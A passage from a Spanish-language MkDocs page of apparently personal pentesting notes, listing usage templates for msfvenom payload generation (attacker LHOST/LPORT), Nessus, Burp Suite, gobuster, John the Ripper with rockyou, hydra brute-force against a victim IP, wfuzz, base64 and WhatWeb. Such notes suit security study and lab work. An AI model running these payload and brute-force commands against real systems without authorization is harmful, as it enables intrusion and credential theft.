<p>A pesar de que esta herramienta muestra un repertorio de exploits, es tambien interesante buscar mas en internet (sobre todo en github).</p>
<hr />
<h2 id="4-msfvenom">4. Msfvenom</h2>
<p>Esta herramienta se utiliza para generar payloads personalizados para una amplia variedad de sistemas operativos y arquitecturas. Para ello, lo primero que hay que hacer es listar los payloads, y filtrarlos mediante <em>grep</em> con palabras clave. El comando para listar payloads es el siguiente</p>
<pre><code class="language-bash">msfvenom -l
</code></pre>
<p>Una vez ya hemos encontrado el payload que nos interesa, para poder guardarnoslo en nuestra máquina hay que ejecutar el siguiente comando</p>
<pre><code class="language-bash">msfvenom -p {payload} LHOST={@ip atacante} LPORT={puerto de escucha} -f {tipo de fichero} -o {filename.extension}
</code></pre>
<hr />
<h2 id="5-nessus">5. Nessus</h2>
<p>Otra herramienta para hacer un escaneo y reportar vulnerabilidades es Nessus. Nessus es un servicio que corre en el puerto 8834 en nuestro ordenador (en el localhost) con el servicio HTTPS. Para poder utilizarlo, primero hay que iniciar el servicio mediante</p>
<pre><code class="language-bash">systemctl start nessusd.service
</code></pre>
<p>Y una vez ya está corriendo, mediante un navegador web, debemos acceder a https://localhost:8834. Cuando nos encontramos ya dentro de nessus, para iniciar un nuevo escaneo hay que persionar el boton "New Scan" situado en la esquina superior derecha, lo que nos redirige a una página con una amplia selección de posibles escaneos. Los mas utilizados son
- Advanced Scan → es un escaneo lento, pero que reporta las posibles vulnerabilidades
- Host Discovery → escaneo muy básico (no es tan útil)</p>
<hr />
<h2 id="6-burpsuite">6. Burpsuite</h2>
<p>Burpsuite es un proxy de interceptacion, que hace de intermediario entre una página web y el atacante, para poder gestionar manualmente los request y response. Para acceder se puede acceder desde el <em>rofi</em>, desde la terminal con el comando <em>"burpsuite"</em> o con el atajo "Super + shift + b" (en mi kali linux al menos).</p>
<hr />
<h2 id="7-gobuster">7. Gobuster</h2>
<p>Gobuster es una herramienta que permite enumerar directorios en una web mediante un diccionario. A este ataque se le llama FUZZING, y es útil sobre todo para recopilar información. El comando mas utilizado es el siguiente:</p>
<pre><code class="language-bash">gobuster dir -w {diccionario} -u {URL} -t {numero de threads} -x {extensiones}
</code></pre>
<ul>
<li>Diccionario → diccionario que se utilizará para hacer el fuzzing. Los mas comunes son:<ul>
<li><em>/usr/share/wordlists/dirb/common.txt</em></li>
<li><em>/usr/share/wordlsists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt</em></li>
</ul>
</li>
<li>URL → la url sobre la que se realizará el ataque. Por ejemplo http://{ip victima}</li>
<li>Numero de threads → numero de threads utilizados en el ataque (para que vaya mas rápido). Por ejemplo 20</li>
<li>Extensiones → extensiones que pueden tener los directorios (html,php,txt,php.bak). Para esto es mejor usar el diccionario de SecLists</li>
</ul>
<hr />
<h2 id="8-hash-identifier-john-the-ripper">8. Hash-identifier + John The Ripper</h2>
<p>Estas dos herramientas se suelen utilizar en conjunto, ya que la primera, <em>hash-identifier</em> sirve para identificar el tipo de hash con el que esta encriptada una cadena y <em>John The Ripper</em> sirve para desencriptarla (para utilizarla es necesario pasarle por parámetro el tipo de hash). Los comandos son los siguientes:</p>
<pre><code class="language-bash">hash-identifier
john --format=Raw-{Tipo hash} --wordlist={diccionario} {fichero con el hash}
</code></pre>
<p>El diccionario por excelencia es <em>"/usr/share/wordlists/rockyout.txt"</em>.</p>
<hr />
<h2 id="9-hydra">9. Hydra</h2>
<p>Hydra es una herramienta para ejecutar ataques de fuerza bruta. Para este ataque es necesario saber el servicio al que se va a intentar hacer el ataque (FTP, SSH, HTTP...) y es recomendable saber una de las dos credenciales (o usuario o contraseña) ya que si no conocemos ninguna y ejecutamos el ataque de fuerza bruta con dos diccionarios puede llegar a tardar mucho. A continuacion ponemos los 3 casos mas comunes con FTP (para cambiar de servicio solo hay que cambiar ftp por el servicio que sea (ssh, http,...))</p>
<pre><code class="language-bash">hydra -l {user} -P {diccionario} ftp://{ip víctima}
hydra -L {diccionario} -p {password} ftp://{ip víctima}
hydra -L {diccionario} -P {diccionario} ftp://{ip víctima} (esta es mejor no hacerla, tarda mucho)
</code></pre>
<hr />
<h1 id="10-wfuzz">10. Wfuzz</h1>
<p>Herramienta que sirve para enumerar subdominios de una web. El comando que se utiliza es el siguiente:</p>
<pre><code class="language-bash">wfuzz -c --nc 400 -t 200 -w &lt;diccionario&gt; -v &lt;dominio&gt; -H &quot;HOST: FUZZ.&lt;dominio&gt;&quot;
</code></pre>
<p>De esta manera, el comando <em>wfuzz</em> busca subdominios cambiando la palabra <em>FUZZ</em> por los subdominios del diccionario.</p>
<hr />
<h1 id="11-base64">11. Base64</h1>
<p>Esto es muy útil y sale mucho (se utiliza mucho). Para decodificar cadenas en base64 ejecutamos el siguiente comando:</p>
<pre><code class="language-bash">echo &quot;cadena_base64&quot; | base64 --decode
</code></pre>
<p>Para codificar en base64, se ejecuta lo siguiente:</p>
<pre><code class="language-bash">echo &quot;texto&quot; | base64
</code></pre>
<hr />
<h1 id="12-whatweb">12. WhatWeb</h1>
<p>Herramienta de código abierto diseñada para identificar las tecnologías utilizadas en sitios web. WhatWeb puede detectar sistemas de gestión de contenido (CMS), plataformas de blogs, paquetes de análisis estadístico, bibliotecas de JavaScript, servidores web y dispositivos embebidos. Además, es capaz de identificar números de versión, direcciones de correo electrónico, identificadores de cuentas, módulos de frameworks web, errores SQL y más. El comando utilizado es el siguiente:</p>
<pre><code class="language-bash">whatweb http://ejemplo.com
</code></pre>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
        
<div class="md-social">
  
    
    
    
    
      
      
    
    <a href="https://www.linkedin.com/in/isa%C3%ADas-vela-sotil-b436431a4/" target="_blank" rel="noopener" title="www.linkedin.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3M135.4 416H69V202.2h66.5V416zM102.2 96a38.5 38.5 0 1 1 0 77 38.5 38.5 0 1 1 0-77m282.1 320h-66.4V312c0-24.8-.5-56.7-34.5-56.7-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5 67.2 0 79.7 44.3 79.7 101.9z"/></svg>
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    
      
      <script id="__config" type="application/json">{"base": "../../..", "features": ["navigation.tabs", "content.code.copy", "search.highlight", "navigation.instant"], "search": "../../../assets/javascripts/workers/search.973d3a69.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
    
    
      <script src="../../../assets/javascripts/bundle.92b07e13.min.js"></script>
      
    
  </body>
</html>